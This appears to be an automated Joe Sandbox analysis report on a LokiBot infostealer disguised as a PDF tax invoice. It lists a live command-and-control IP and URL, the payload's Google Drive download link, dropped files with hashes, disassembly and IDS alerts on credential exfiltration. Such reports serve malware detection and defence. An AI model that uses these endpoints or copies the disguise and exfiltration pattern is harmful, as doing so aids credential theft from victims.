      SourceDetectionScannerLabelLink
      http://63.250.34.171/tickets.php?id=1569%VirustotalBrowse
      http://63.250.34.171/tickets.php?id=156100%Avira URL Cloudmalware
      https://csp.withgoogle.com/csp/report-to/gse_l9ocaq0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      drive.google.com
      142.250.203.110
      truefalse
        high
        googlehosted.l.googleusercontent.com
        142.250.203.97
        truefalse
          high
          doc-0s-8g-docs.googleusercontent.com
          unknown
          unknownfalse
            high

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            https://doc-0s-8g-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/e3qi22h3f39crtgptlkpn346psio1vva/1638430350000/13431600623523591888/*/1vel8-ekCr0ivRl8u50SHCZNZh1tCa62N?e=downloadfalse
              high
              http://63.250.34.171/tickets.php?id=156true
              • 9%, Virustotal, Browse
              • Avira URL Cloud: malware
              unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://doc-0s-8g-docs.googleusercontent.com/aF/TForm_Pilleorms8.exe, 00000009.00000003.867334806.0000000000839000.00000004.00000001.sdmp, Form_Pilleorms8.exe, 00000009.00000003.868205288.0000000000836000.00000004.00000001.sdmpfalse
                high
                http://nsis.sf.net/NSIS_ErrorErrorNTS_eTaxInvoice 1-12-2021#U00b7pdf.exefalse
                  high
                  https://doc-0s-8g-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/e3qi22h3Form_Pilleorms8.exe, 00000009.00000003.867323522.0000000000834000.00000004.00000001.sdmpfalse
                    high
                    https://doc-0s-8g-docs.googleusercontent.com/Form_Pilleorms8.exe, 00000009.00000002.898001784.000000001E5B3000.00000004.00000001.sdmpfalse
                      high
                      https://csp.withgoogle.com/csp/report-to/gse_l9ocaqForm_Pilleorms8.exe, 00000009.00000003.867261601.0000000000830000.00000004.00000001.sdmp, Form_Pilleorms8.exe, 00000009.00000003.867343990.0000000000834000.00000004.00000001.sdmp, Form_Pilleorms8.exe, 00000009.00000003.867323522.0000000000834000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown

                      Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public

                      IPDomainCountryFlagASNASN NameMalicious
                      142.250.203.97
                      googlehosted.l.googleusercontent.comUnited States
                      15169GOOGLEUSfalse
                      63.250.34.171
                      unknownUnited States
                      22612NAMECHEAP-NETUStrue
                      142.250.203.110
                      drive.google.comUnited States
                      15169GOOGLEUSfalse

                      General Information

                      Joe Sandbox Version:34.0.0 Boulder Opal
                      Analysis ID:532411
                      Start date:02.12.2021
                      Start time:08:31:13
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 6m 29s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Sample file name:NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                      Number of analysed new started processes analysed:16
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal100.troj.spyw.evad.winEXE@5/4@2/3
                      EGA Information:Failed
                      HDC Information:
                      • Successful, ratio: 100% (good quality ratio 97.1%)
                      • Quality average: 84.4%
                      • Quality standard deviation: 23.8%
                      HCA Information:Failed
                      Cookbook Comments:
                      • Adjust boot time
                      • Enable AMSI
                      • Found application associated with file extension: .exe
                      Warnings:
                      Show All
                      • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                      • Excluded IPs from analysis (whitelisted): 23.211.6.115
                      • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      08:33:52API Interceptor1x Sleep call for process: Form_Pilleorms8.exe modified

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      63.250.34.171lzJWJgZhPc.exeGet hashmaliciousBrowse
                      • 63.250.34.171/tickets.php?id=277
                      90888234001.exeGet hashmaliciousBrowse
                      • 63.250.34.171/tickets.php?id=539
                      FedEx Shipping documents.exeGet hashmaliciousBrowse
                      • 63.250.34.171/tickets.php?id=552
                      RFQ 001030112021#U00b7pdf.exeGet hashmaliciousBrowse
                      • 63.250.34.171/tickets.php?id=277
                      Anexo I e II do convite#U00b7pdf.exeGet hashmaliciousBrowse
                      • 63.250.34.171/tickets.php?id=156
                      QfXk1qRIDN.exeGet hashmaliciousBrowse
                      • 63.250.34.171/tickets.php?id=537
                      P.I..xlsxGet hashmaliciousBrowse
                      • 63.250.34.171/tickets.php?id=537
                      Lkinv70923.exeGet hashmaliciousBrowse
                      • 63.250.34.171/tickets.php?id=550
                      ODkVvBA5vb.exeGet hashmaliciousBrowse
                      • 63.250.34.171/tickets.php?id=537
                      PROFORMA INVOICE.xlsxGet hashmaliciousBrowse
                      • 63.250.34.171/tickets.php?id=537
                      Product_Specification_Sheet.xlsxGet hashmaliciousBrowse
                      • 63.250.34.171/tickets.php?id=538
                      loader2.exeGet hashmaliciousBrowse
                      • 63.250.34.171/tickets.php?id=550
                      3MBqpjNC1q.exeGet hashmaliciousBrowse
                      • 63.250.34.171/tickets.php?id=537
                      Ship particulars.xlsxGet hashmaliciousBrowse
                      • 63.250.34.171/tickets.php?id=537
                      DHL Receipt_AWB8114704847788.exeGet hashmaliciousBrowse
                      • 63.250.34.171/tickets.php?id=552
                      HalkbankEkstre20211124073809405251,pdf.exeGet hashmaliciousBrowse
                      • 63.250.34.171/tickets.php?id=562
                      Order EnquiryCRM0754000001965-pdf(109KB).exeGet hashmaliciousBrowse
                      • 63.250.34.171/tickets.php?id=544

                      Domains

                      No context

                      ASN

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      NAMECHEAP-NETUSlzJWJgZhPc.exeGet hashmaliciousBrowse
                      • 63.250.34.171
                      Poh Tiong Trading - products list.exeGet hashmaliciousBrowse
                      • 198.54.117.217
                      SKM_C01112021.exeGet hashmaliciousBrowse
                      • 198.54.117.210
                      90888234001.exeGet hashmaliciousBrowse
                      • 63.250.34.171
                      TZAT0vss4p.exeGet hashmaliciousBrowse
                      • 162.213.251.105
                      Orden econo-002064.pdf.exeGet hashmaliciousBrowse
                      • 198.54.122.60
                      DOC209272621615.PDF.exeGet hashmaliciousBrowse
                      • 198.54.117.211
                      FedEx Shipping documents.exeGet hashmaliciousBrowse
                      • 63.250.34.171
                      WMHighfield.htmlGet hashmaliciousBrowse
                      • 198.54.115.249
                      quotation-linde-tunisia-plc-december-2021.xlsxGet hashmaliciousBrowse
                      • 198.54.117.216
                      Gracehealthmi.org7X9YCEB6AI.htmGet hashmaliciousBrowse
                      • 162.0.232.224
                      3F6uSD2qZXHmXb8.exeGet hashmaliciousBrowse
                      • 162.255.119.151
                      OVER R RICHIESTA D'OFFERTA ITEM R206,pdf.exeGet hashmaliciousBrowse
                      • 63.250.38.71
                      RFQ 001030112021#U00b7pdf.exeGet hashmaliciousBrowse
                      • 63.250.34.171
                      draft_inv dec21.exeGet hashmaliciousBrowse
                      • 185.61.153.97
                      Overdue Invoice.exeGet hashmaliciousBrowse
                      • 198.54.117.215
                      SOA.exeGet hashmaliciousBrowse
                      • 37.61.238.59
                      Statement 12-01-2021.exeGet hashmaliciousBrowse
                      • 198.54.117.215
                      Sz4lxTmH7r.exeGet hashmaliciousBrowse
                      • 199.192.28.206
                      77isbA5bpi.exeGet hashmaliciousBrowse
                      • 198.54.117.218

                      JA3 Fingerprints

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      37f463bf4616ecd445d4a1937da06e19837375615376.dllGet hashmaliciousBrowse
                      • 142.250.203.110
                      • 142.250.203.97
                      lzJWJgZhPc.exeGet hashmaliciousBrowse
                      • 142.250.203.110
                      • 142.250.203.97
                      #U0420R#U04223445FM.htmGet hashmaliciousBrowse
                      • 142.250.203.110
                      • 142.250.203.97
                      SMK_EFT_BILLPAY.htmlGet hashmaliciousBrowse
                      • 142.250.203.110
                      • 142.250.203.97
                      GlobalfoundriesINV33-45776648.htmGet hashmaliciousBrowse
                      • 142.250.203.110
                      • 142.250.203.97
                      koCttsCjGY.exeGet hashmaliciousBrowse
                      • 142.250.203.110
                      • 142.250.203.97
                      PaCJ39hC4R.xlsxGet hashmaliciousBrowse
                      • 142.250.203.110
                      • 142.250.203.97
                      Chrome.Update.23af76.jsGet hashmaliciousBrowse
                      • 142.250.203.110
                      • 142.250.203.97
                      DHL Express shipment notification.exeGet hashmaliciousBrowse
                      • 142.250.203.110
                      • 142.250.203.97
                      Chrome.Update.23af76.jsGet hashmaliciousBrowse
                      • 142.250.203.110
                      • 142.250.203.97
                      Transferencia_29_11_2021 17.03.39.exeGet hashmaliciousBrowse
                      • 142.250.203.110
                      • 142.250.203.97
                      part-1500645108.xlsbGet hashmaliciousBrowse
                      • 142.250.203.110
                      • 142.250.203.97
                      gXphSPTf52.exeGet hashmaliciousBrowse
                      • 142.250.203.110
                      • 142.250.203.97
                      VM845.htmlGet hashmaliciousBrowse
                      • 142.250.203.110
                      • 142.250.203.97
                      Rl3M5OSf6P.exeGet hashmaliciousBrowse
                      • 142.250.203.110
                      • 142.250.203.97
                      #U0192#U0e25#U00a2_#U0192#U03b1#U0aee#U01ad#U00b5#U0ae8#U03b1_#U05e0jumozeK_Yim73678.vbsGet hashmaliciousBrowse
                      • 142.250.203.110
                      • 142.250.203.97
                      DOC209272621615.PDF.exeGet hashmaliciousBrowse
                      • 142.250.203.110
                      • 142.250.203.97
                      item-40567503.xlsbGet hashmaliciousBrowse
                      • 142.250.203.110
                      • 142.250.203.97
                      ATT14851.htmlGet hashmaliciousBrowse
                      • 142.250.203.110
                      • 142.250.203.97
                      AtlanticareINV25-67431254.htmGet hashmaliciousBrowse
                      • 142.250.203.110
                      • 142.250.203.97

                      Dropped Files

                      No context

                      Created / dropped Files

                      C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe
                      Process:C:\Users\user\Desktop\NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe
                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):99217408
                      Entropy (8bit):0.9332268185502526
                      Encrypted:false
                      SSDEEP:1536:DUDiSjEhPigvTZNu/JUWYrS8M2WQ5JYNg9A81a7+kDwTyDmgw5HuWT:DU3j0PDvTroUWY+SV5AFf25FT
                      MD5:6196B71B6602AA420325B1124C64B20A
                      SHA1:B6A72182D7D0F755A14541B4D2BCA13C19813D53
                      SHA-256:6EA314C3EFFEAD199543501A9301F0F13CCB3A01D9BD7F67E4F6803144241571
                      SHA-512:C0B47DCF76FD4B6074827BD41B19BB751E06BD5D3FF41FBB37B8A7F267FEF03A26B12704D5C026B684B48C6201854450B013D6AE5F94512A1D36D3DEF911D6C7
                      Malicious:true
                      Antivirus:
                      • Antivirus: Joe Sandbox ML, Detection: 100%
                      Reputation:low
                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............i...i...i...d...i.Rich..i.................PE..L...O..Y.....................@....................@.........................................................................d...(........3.................................................................. ... .......<............................text...X........................... ..`.data...L...........................@....rsrc....3.......@..................@..@..V............MSVBVM60.DLL............................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Roaming\C79A3B\B52B3F.exe (copy)
                      Process:C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe
                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):99217408
                      Entropy (8bit):0.9332268185502526
                      Encrypted:false
                      SSDEEP:
                      MD5:6196B71B6602AA420325B1124C64B20A
                      SHA1:B6A72182D7D0F755A14541B4D2BCA13C19813D53
                      SHA-256:6EA314C3EFFEAD199543501A9301F0F13CCB3A01D9BD7F67E4F6803144241571
                      SHA-512:C0B47DCF76FD4B6074827BD41B19BB751E06BD5D3FF41FBB37B8A7F267FEF03A26B12704D5C026B684B48C6201854450B013D6AE5F94512A1D36D3DEF911D6C7
                      Malicious:false
                      Reputation:low
                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............i...i...i...d...i.Rich..i.................PE..L...O..Y.....................@....................@.........................................................................d...(........3.................................................................. ... .......<............................text...X........................... ..`.data...L...........................@....rsrc....3.......@..................@..@..V............MSVBVM60.DLL............................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck
                      Process:C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Reputation:high, very likely benign file
                      Preview: 1
                      C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\bc49718863ee53e026d805ec372039e9_d06ed635-68f6-4e9a-955c-4899f5f57b9a
                      Process:C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):46
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:
                      MD5:D898504A722BFF1524134C6AB6A5EAA5
                      SHA1:E0FDC90C2CA2A0219C99D2758E68C18875A3E11E
                      SHA-256:878F32F76B159494F5A39F9321616C6068CDB82E88DF89BCC739BBC1EA78E1F9
                      SHA-512:26A4398BFFB0C0AEF9A6EC53CD3367A2D0ABF2F70097F711BBBF1E9E32FD9F1A72121691BB6A39EEB55D596EDD527934E541B4DEFB3B1426B1D1A6429804DC61
                      Malicious:false
                      Reputation:moderate, very likely benign file
                      Preview: ..............................................

                      Static File Info

                      General

                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                      Entropy (8bit):4.73921520264868
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe
                      File size:190030
                      MD5:9ff3b37069e0772af03732b022c02789
                      SHA1:ebaa34d6e69a4a33ad40ac64791b5f6366b7be9c
                      SHA256:18b734b7b7da572d6ae29aedc5d0105e6b0ad96ba6c9bd100710b147d53f1a3b
                      SHA512:a7adfcd88ed04c03a93406eca63824eea8a71dd3471bde3e8217a1c184db064eff90c73a0036bfd36a908f45761454f0344166de6a8e07ee83b57588fffa6dee
                      SSDEEP:1536:g/T2X/jN2vxZz0DTHUpou4ubWaClx+HkSC3WR6TFjSS01+POsdII4ScV:gbG7N2kDTHUpou4ubj4xUsFj0+mYIyg
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j.........

                      File Icon

                      Icon Hash:b2a88c96b2ca6a72

                      Static PE Info

                      General

                      Entrypoint:0x40352d
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Time Stamp:0x614F9B5A [Sat Sep 25 21:57:46 2021 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:4
                      OS Version Minor:0
                      File Version Major:4
                      File Version Minor:0
                      Subsystem Version Major:4
                      Subsystem Version Minor:0
                      Import Hash:56a78d55f3f7af51443e58e0ce2fb5f6

                      Entrypoint Preview

                      Instruction
                      push ebp
                      mov ebp, esp
                      sub esp, 000003F4h
                      push ebx
                      push esi
                      push edi
                      push 00000020h
                      pop edi
                      xor ebx, ebx
                      push 00008001h
                      mov dword ptr [ebp-14h], ebx
                      mov dword ptr [ebp-04h], 0040A2E0h
                      mov dword ptr [ebp-10h], ebx
                      call dword ptr [004080CCh]
                      mov esi, dword ptr [004080D0h]
                      lea eax, dword ptr [ebp-00000140h]
                      push eax
                      mov dword ptr [ebp-0000012Ch], ebx
                      mov dword ptr [ebp-2Ch], ebx
                      mov dword ptr [ebp-28h], ebx
                      mov dword ptr [ebp-00000140h], 0000011Ch
                      call esi
                      test eax, eax
                      jne 00007FE6D8DF3B1Ah
                      lea eax, dword ptr [ebp-00000140h]
                      mov dword ptr [ebp-00000140h], 00000114h
                      push eax
                      call esi
                      mov ax, word ptr [ebp-0000012Ch]
                      mov ecx, dword ptr [ebp-00000112h]
                      sub ax, 00000053h
                      add ecx, FFFFFFD0h
                      neg ax
                      sbb eax, eax
                      mov byte ptr [ebp-26h], 00000004h
                      not eax
                      and eax, ecx
                      mov word ptr [ebp-2Ch], ax
                      cmp dword ptr [ebp-0000013Ch], 0Ah
                      jnc 00007FE6D8DF3AEAh
                      and word ptr [ebp-00000132h], 0000h
                      mov eax, dword ptr [ebp-00000134h]
                      movzx ecx, byte ptr [ebp-00000138h]
                      mov dword ptr [00434FB8h], eax
                      xor eax, eax
                      mov ah, byte ptr [ebp-0000013Ch]
                      movzx eax, ax
                      or eax, ecx
                      xor ecx, ecx
                      mov ch, byte ptr [ebp-2Ch]
                      movzx ecx, cx
                      shl eax, 10h
                      or eax, ecx

                      Rich Headers

                      Programming Language:
                      • [EXP] VC++ 6.0 SP5 build 8804

                      Data Directories

                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0x86100xa0.rdata
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x4c0000x11e0.rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                      Sections

                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      .text0x10000x68970x6a00False0.666126179245data6.45839821493IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      .rdata0x80000x14a60x1600False0.439275568182data5.02410928126IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .data0xa0000x2b0180x600False0.521484375data4.15458210409IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                      .ndata0x360000x160000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .rsrc0x4c0000x11e00x1200False0.368489583333data4.48173978815IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                      Resources

                      NameRVASizeTypeLanguageCountry
                      RT_BITMAP0x4c2680x368dataEnglishUnited States
                      RT_ICON0x4c5d00x2e8dataEnglishUnited States
                      RT_DIALOG0x4c8b80x144dataEnglishUnited States
                      RT_DIALOG0x4ca000x13cdataEnglishUnited States
                      RT_DIALOG0x4cb400x100dataEnglishUnited States
                      RT_DIALOG0x4cc400x11cdataEnglishUnited States
                      RT_DIALOG0x4cd600xc4dataEnglishUnited States
                      RT_DIALOG0x4ce280x60dataEnglishUnited States
                      RT_GROUP_ICON0x4ce880x14dataEnglishUnited States
                      RT_MANIFEST0x4cea00x33eXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                      Imports

                      DLLImport
                      ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                      SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                      ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                      COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                      USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                      GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                      KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

                      Possible Origin

                      Language of compilation systemCountry where language is spokenMap
                      EnglishUnited States

                      Network Behavior

                      Snort IDS Alerts

                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                      12/02/21-08:33:46.876918TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14981080192.168.2.463.250.34.171
                      12/02/21-08:33:46.876918TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981080192.168.2.463.250.34.171
                      12/02/21-08:33:46.876918TCP2025381ET TROJAN LokiBot Checkin4981080192.168.2.463.250.34.171
                      12/02/21-08:33:46.876918TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24981080192.168.2.463.250.34.171
                      12/02/21-08:33:47.897662TCP1201ATTACK-RESPONSES 403 Forbidden804981063.250.34.171192.168.2.4
                      12/02/21-08:33:50.606987TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14981180192.168.2.463.250.34.171
                      12/02/21-08:33:50.606987TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981180192.168.2.463.250.34.171
                      12/02/21-08:33:50.606987TCP2025381ET TROJAN LokiBot Checkin4981180192.168.2.463.250.34.171
                      12/02/21-08:33:50.606987TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24981180192.168.2.463.250.34.171
                      12/02/21-08:33:51.640058TCP1201ATTACK-RESPONSES 403 Forbidden804981163.250.34.171192.168.2.4
                      12/02/21-08:33:53.022578TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981280192.168.2.463.250.34.171
                      12/02/21-08:33:53.022578TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981280192.168.2.463.250.34.171
                      12/02/21-08:33:53.022578TCP2025381ET TROJAN LokiBot Checkin4981280192.168.2.463.250.34.171
                      12/02/21-08:33:53.022578TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981280192.168.2.463.250.34.171
                      12/02/21-08:33:53.944992TCP1201ATTACK-RESPONSES 403 Forbidden804981263.250.34.171192.168.2.4

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Dec 2, 2021 08:33:42.683718920 CET49807443192.168.2.4142.250.203.110
                      Dec 2, 2021 08:33:42.683780909 CET44349807142.250.203.110192.168.2.4
                      Dec 2, 2021 08:33:42.683872938 CET49807443192.168.2.4142.250.203.110
                      Dec 2, 2021 08:33:42.703856945 CET49807443192.168.2.4142.250.203.110
                      Dec 2, 2021 08:33:42.703907967 CET44349807142.250.203.110192.168.2.4
                      Dec 2, 2021 08:33:42.764354944 CET44349807142.250.203.110192.168.2.4
                      Dec 2, 2021 08:33:42.764461040 CET49807443192.168.2.4142.250.203.110
                      Dec 2, 2021 08:33:42.765436888 CET44349807142.250.203.110192.168.2.4
                      Dec 2, 2021 08:33:42.765538931 CET49807443192.168.2.4142.250.203.110
                      Dec 2, 2021 08:33:43.035711050 CET49807443192.168.2.4142.250.203.110
                      Dec 2, 2021 08:33:43.035742998 CET44349807142.250.203.110192.168.2.4
                      Dec 2, 2021 08:33:43.036320925 CET44349807142.250.203.110192.168.2.4
                      Dec 2, 2021 08:33:43.036417007 CET49807443192.168.2.4142.250.203.110
                      Dec 2, 2021 08:33:43.049748898 CET49807443192.168.2.4142.250.203.110
                      Dec 2, 2021 08:33:43.092889071 CET44349807142.250.203.110192.168.2.4
                      Dec 2, 2021 08:33:44.239890099 CET44349807142.250.203.110192.168.2.4
                      Dec 2, 2021 08:33:44.240072966 CET44349807142.250.203.110192.168.2.4
                      Dec 2, 2021 08:33:44.240109921 CET49807443192.168.2.4142.250.203.110
                      Dec 2, 2021 08:33:44.240178108 CET49807443192.168.2.4142.250.203.110
                      Dec 2, 2021 08:33:44.277873993 CET49807443192.168.2.4142.250.203.110
                      Dec 2, 2021 08:33:44.277913094 CET44349807142.250.203.110192.168.2.4
                      Dec 2, 2021 08:33:44.345295906 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.345347881 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.345514059 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.346415997 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.346436024 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.402117014 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.402262926 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.403045893 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.403151035 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.412708998 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.412729025 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.412961960 CET44349808142.250.203.97192.168.2.4
